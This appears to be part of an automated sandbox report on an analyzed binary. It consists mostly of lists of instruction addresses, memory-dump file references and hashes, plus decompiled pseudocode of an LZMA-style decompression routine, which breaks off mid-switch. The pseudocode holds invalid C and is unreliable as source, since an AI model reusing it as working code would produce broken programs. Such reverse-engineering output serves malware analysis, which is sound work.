                                                                                                        0x004061d7
                                                                                                        0x004061da
                                                                                                        0x004061de
                                                                                                        0x004061e1
                                                                                                        0x004061e7
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061ec
                                                                                                        0x004061ef
                                                                                                        0x004061ef
                                                                                                        0x004061f2
                                                                                                        0x004061f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061fb
                                                                                                        0x00406201
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406207
                                                                                                        0x00406207
                                                                                                        0x0040620b
                                                                                                        0x0040620e
                                                                                                        0x00406211
                                                                                                        0x00406214
                                                                                                        0x00406217
                                                                                                        0x00406218
                                                                                                        0x0040621b
                                                                                                        0x0040621d
                                                                                                        0x00406223
                                                                                                        0x00406226
                                                                                                        0x00406229
                                                                                                        0x0040622c
                                                                                                        0x0040622f
                                                                                                        0x00406232
                                                                                                        0x00406235
                                                                                                        0x00406251
                                                                                                        0x00406254
                                                                                                        0x00406257
                                                                                                        0x0040625a
                                                                                                        0x00406261
                                                                                                        0x00406265
                                                                                                        0x00406267
                                                                                                        0x0040626b
                                                                                                        0x00406237
                                                                                                        0x00406237
                                                                                                        0x0040623b
                                                                                                        0x00406243
                                                                                                        0x00406248
                                                                                                        0x0040624a
                                                                                                        0x0040624c
                                                                                                        0x0040624c
                                                                                                        0x0040626e
                                                                                                        0x00406275
                                                                                                        0x00406278
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x00406283
                                                                                                        0x00406283
                                                                                                        0x00406287
                                                                                                        0x00406947
                                                                                                        0x00000000
                                                                                                        0x00406947
                                                                                                        0x0040628d
                                                                                                        0x00406290
                                                                                                        0x00406293
                                                                                                        0x00406297
                                                                                                        0x0040629a
                                                                                                        0x004062a0
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a5
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062ae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004062b0
                                                                                                        0x004062b3
                                                                                                        0x004062b6
                                                                                                        0x004062b9
                                                                                                        0x004062bc
                                                                                                        0x004062bf
                                                                                                        0x004062c2
                                                                                                        0x004062c5
                                                                                                        0x004062c8
                                                                                                        0x004062cb
                                                                                                        0x004062ce
                                                                                                        0x004062e6
                                                                                                        0x004062e9
                                                                                                        0x004062ec
                                                                                                        0x004062ef
                                                                                                        0x004062ef
                                                                                                        0x004062f2
                                                                                                        0x004062f6
                                                                                                        0x004062f8
                                                                                                        0x004062d0
                                                                                                        0x004062d0
                                                                                                        0x004062d8
                                                                                                        0x004062dd
                                                                                                        0x004062df
                                                                                                        0x004062e1
                                                                                                        0x004062e1
                                                                                                        0x004062fb
                                                                                                        0x00406302
                                                                                                        0x00406305
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00406305
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406347
                                                                                                        0x00406347
                                                                                                        0x0040634b
                                                                                                        0x00406953
                                                                                                        0x00000000
                                                                                                        0x00406953
                                                                                                        0x00406351
                                                                                                        0x00406354
                                                                                                        0x00406357
                                                                                                        0x0040635b
                                                                                                        0x0040635e
                                                                                                        0x00406364
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406369
                                                                                                        0x0040636c
                                                                                                        0x0040636c
                                                                                                        0x00406372
                                                                                                        0x00406310
                                                                                                        0x00406310
                                                                                                        0x00406313
                                                                                                        0x00000000
                                                                                                        0x00406313
                                                                                                        0x00406374
                                                                                                        0x00406374
                                                                                                        0x00406377
                                                                                                        0x0040637a
                                                                                                        0x0040637d
                                                                                                        0x00406380
                                                                                                        0x00406383
                                                                                                        0x00406386
                                                                                                        0x00406389
                                                                                                        0x0040638c
                                                                                                        0x0040638f
                                                                                                        0x00406392
                                                                                                        0x004063aa
                                                                                                        0x004063ad
                                                                                                        0x004063b0
                                                                                                        0x004063b3
                                                                                                        0x004063b3
                                                                                                        0x004063b6
                                                                                                        0x004063ba
                                                                                                        0x004063bc
                                                                                                        0x00406394
                                                                                                        0x00406394
                                                                                                        0x0040639c
                                                                                                        0x004063a1
                                                                                                        0x004063a3
                                                                                                        0x004063a5
                                                                                                        0x004063a5
                                                                                                        0x004063bf
                                                                                                        0x004063c6
                                                                                                        0x004063c9
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x00406658
                                                                                                        0x00406658
                                                                                                        0x0040665c
                                                                                                        0x00406983
                                                                                                        0x00000000
                                                                                                        0x00406983
                                                                                                        0x00406662
                                                                                                        0x00406665
                                                                                                        0x00406668
                                                                                                        0x0040666c
                                                                                                        0x0040666f
                                                                                                        0x00406675
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x0040667a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406428
                                                                                                        0x00406428
                                                                                                        0x0040642b
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x00406767
                                                                                                        0x0040676b
                                                                                                        0x0040678d
                                                                                                        0x00406790
                                                                                                        0x0040679a
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040676d
                                                                                                        0x00406770
                                                                                                        0x00406774
                                                                                                        0x00406777
                                                                                                        0x00406777
                                                                                                        0x0040677a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406824
                                                                                                        0x00406828
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x0040684d
                                                                                                        0x00406854
                                                                                                        0x0040685b
                                                                                                        0x0040685b
                                                                                                        0x00000000
                                                                                                        0x0040685b
                                                                                                        0x0040682a
                                                                                                        0x0040682d
                                                                                                        0x00406830
                                                                                                        0x00406833
                                                                                                        0x0040683a
                                                                                                        0x0040677e
                                                                                                        0x0040677e
                                                                                                        0x00406781
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406915
                                                                                                        0x00406918
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040654f
                                                                                                        0x00406551
                                                                                                        0x00406558
                                                                                                        0x00406559
                                                                                                        0x0040655b
                                                                                                        0x0040655e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406566
                                                                                                        0x00406569
                                                                                                        0x0040656c
                                                                                                        0x0040656e
                                                                                                        0x00406570
                                                                                                        0x00406570
                                                                                                        0x00406571
                                                                                                        0x00406574
                                                                                                        0x0040657b
                                                                                                        0x0040657e
                                                                                                        0x0040658c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406871
                                                                                                        0x00406871
                                                                                                        0x00406875
                                                                                                        0x004069ad
                                                                                                        0x00000000
                                                                                                        0x004069ad
                                                                                                        0x0040687b
                                                                                                        0x0040687e
                                                                                                        0x00406881
                                                                                                        0x00406885
                                                                                                        0x00406888
                                                                                                        0x0040688e
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406893
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406899
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x004068fd
                                                                                                        0x00406900
                                                                                                        0x00406905
                                                                                                        0x00406906
                                                                                                        0x00406908
                                                                                                        0x0040690a
                                                                                                        0x0040690d
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x0040681f
                                                                                                        0x00406819
                                                                                                        0x0040689f
                                                                                                        0x004068a5
                                                                                                        0x004068a8
                                                                                                        0x004068ab
                                                                                                        0x004068ae
                                                                                                        0x004068b1
                                                                                                        0x004068b4
                                                                                                        0x004068b7
                                                                                                        0x004068ba
                                                                                                        0x004068bd
                                                                                                        0x004068c0
                                                                                                        0x004068d9
                                                                                                        0x004068dc
                                                                                                        0x004068df
                                                                                                        0x004068e2
                                                                                                        0x004068e6
                                                                                                        0x004068e8
                                                                                                        0x004068e8
                                                                                                        0x004068e9
                                                                                                        0x004068ec
                                                                                                        0x004068c2
                                                                                                        0x004068c2
                                                                                                        0x004068ca
                                                                                                        0x004068cf
                                                                                                        0x004068d1
                                                                                                        0x004068d4
                                                                                                        0x004068d4
                                                                                                        0x004068ef
                                                                                                        0x004068f6
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x00406594
                                                                                                        0x00406597
                                                                                                        0x004065cd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x00406700
                                                                                                        0x00406700
                                                                                                        0x00406703
                                                                                                        0x00406705
                                                                                                        0x0040698f
                                                                                                        0x00000000
                                                                                                        0x0040698f
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406714
                                                                                                        0x00406718
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x00000000
                                                                                                        0x0040671b
                                                                                                        0x00406599
                                                                                                        0x0040659b
                                                                                                        0x0040659d
                                                                                                        0x0040659f
                                                                                                        0x004065a2
                                                                                                        0x004065a3
                                                                                                        0x004065a5
                                                                                                        0x004065a7
                                                                                                        0x004065aa
                                                                                                        0x004065ad
                                                                                                        0x004065c3
                                                                                                        0x004065c8
                                                                                                        0x00406600
                                                                                                        0x00406600
                                                                                                        0x00406604
                                                                                                        0x00406630
                                                                                                        0x00406632
                                                                                                        0x00406639
                                                                                                        0x0040663c
                                                                                                        0x0040663f
                                                                                                        0x0040663f
                                                                                                        0x00406644
                                                                                                        0x00406644
                                                                                                        0x00406646
                                                                                                        0x00406649
                                                                                                        0x00406650
                                                                                                        0x00406653
                                                                                                        0x00406680
                                                                                                        0x00406680
                                                                                                        0x00406683
                                                                                                        0x00406686
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x00000000
                                                                                                        0x004066fa
                                                                                                        0x00406688
                                                                                                        0x0040668e
                                                                                                        0x00406691
                                                                                                        0x00406694
                                                                                                        0x00406697
                                                                                                        0x0040669a
                                                                                                        0x0040669d
                                                                                                        0x004066a0
                                                                                                        0x004066a3
                                                                                                        0x004066a6
                                                                                                        0x004066a9
                                                                                                        0x004066c2
                                                                                                        0x004066c4
                                                                                                        0x004066c7
                                                                                                        0x004066c8
                                                                                                        0x004066cb
                                                                                                        0x004066cd
                                                                                                        0x004066d0
                                                                                                        0x004066d2
                                                                                                        0x004066d4
                                                                                                        0x004066d7
                                                                                                        0x004066d9
                                                                                                        0x004066dc
                                                                                                        0x004066e0
                                                                                                        0x004066e2
                                                                                                        0x004066e2
                                                                                                        0x004066e3
                                                                                                        0x004066e6
                                                                                                        0x004066e9
                                                                                                        0x004066ab
                                                                                                        0x004066ab
                                                                                                        0x004066b3
                                                                                                        0x004066b8
                                                                                                        0x004066ba
                                                                                                        0x004066bd
                                                                                                        0x004066bd
                                                                                                        0x004066ec
                                                                                                        0x004066f3
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f3
                                                                                                        0x00406606
                                                                                                        0x00406609
                                                                                                        0x0040660b
                                                                                                        0x0040660e
                                                                                                        0x00406611
                                                                                                        0x00406614
                                                                                                        0x00406616
                                                                                                        0x00406619
                                                                                                        0x0040661c
                                                                                                        0x0040661c
                                                                                                        0x0040661f
                                                                                                        0x0040661f
                                                                                                        0x00406622
                                                                                                        0x00406629
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00406629
                                                                                                        0x004065af
                                                                                                        0x004065b2
                                                                                                        0x004065b4
                                                                                                        0x004065b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406316
                                                                                                        0x00406316
                                                                                                        0x0040631a
                                                                                                        0x0040695f
                                                                                                        0x00000000
                                                                                                        0x0040695f
                                                                                                        0x00406320
                                                                                                        0x00406323
                                                                                                        0x00406326
                                                                                                        0x00406329
                                                                                                        0x0040632c
                                                                                                        0x0040632f
                                                                                                        0x00406332
                                                                                                        0x00406334
                                                                                                        0x00406337
                                                                                                        0x0040633a
                                                                                                        0x0040633d
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064a1
                                                                                                        0x004064a1
                                                                                                        0x004064a5
                                                                                                        0x0040696b
                                                                                                        0x00000000
                                                                                                        0x0040696b
                                                                                                        0x004064ab
                                                                                                        0x004064ae
                                                                                                        0x004064b1
                                                                                                        0x004064b4
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b9
                                                                                                        0x004064bc
                                                                                                        0x004064bf
                                                                                                        0x004064c2
                                                                                                        0x004064c5
                                                                                                        0x004064c8
                                                                                                        0x004064c9
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064ce
                                                                                                        0x004064d1
                                                                                                        0x004064d4
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064da
                                                                                                        0x004064dc
                                                                                                        0x004064dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x00406722
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406728
                                                                                                        0x0040672b
                                                                                                        0x0040672e
                                                                                                        0x00406731
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406736
                                                                                                        0x00406739
                                                                                                        0x0040673c
                                                                                                        0x0040673f
                                                                                                        0x00406742
                                                                                                        0x00406745
                                                                                                        0x00406746
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x0040674b
                                                                                                        0x0040674e
                                                                                                        0x00406751
                                                                                                        0x00406754
                                                                                                        0x00406757
                                                                                                        0x0040675b
                                                                                                        0x0040675d
                                                                                                        0x00406760
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x00000000
                                                                                                        0x004064df
                                                                                                        0x00406760
                                                                                                        0x00406995
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x004069cc
                                                                                                        0x004069cc
                                                                                                        0x00000000
                                                                                                        0x004069cc
                                                                                                        0x00406819
                                                                                                        0x004067a0
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x004063d4

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                                        • Instruction ID: 235c9a1f152390887c8e3346b3cf8cf745e7d176c25095dba4735a56a8f4339d
                                                                                                        • Opcode Fuzzy Hash: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                                        • Instruction Fuzzy Hash: 80714371D00229CBDF28CFA8C8447ADBBF1FB48305F15806AD846BB281D7395A96DF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004064EE, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E004064EE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
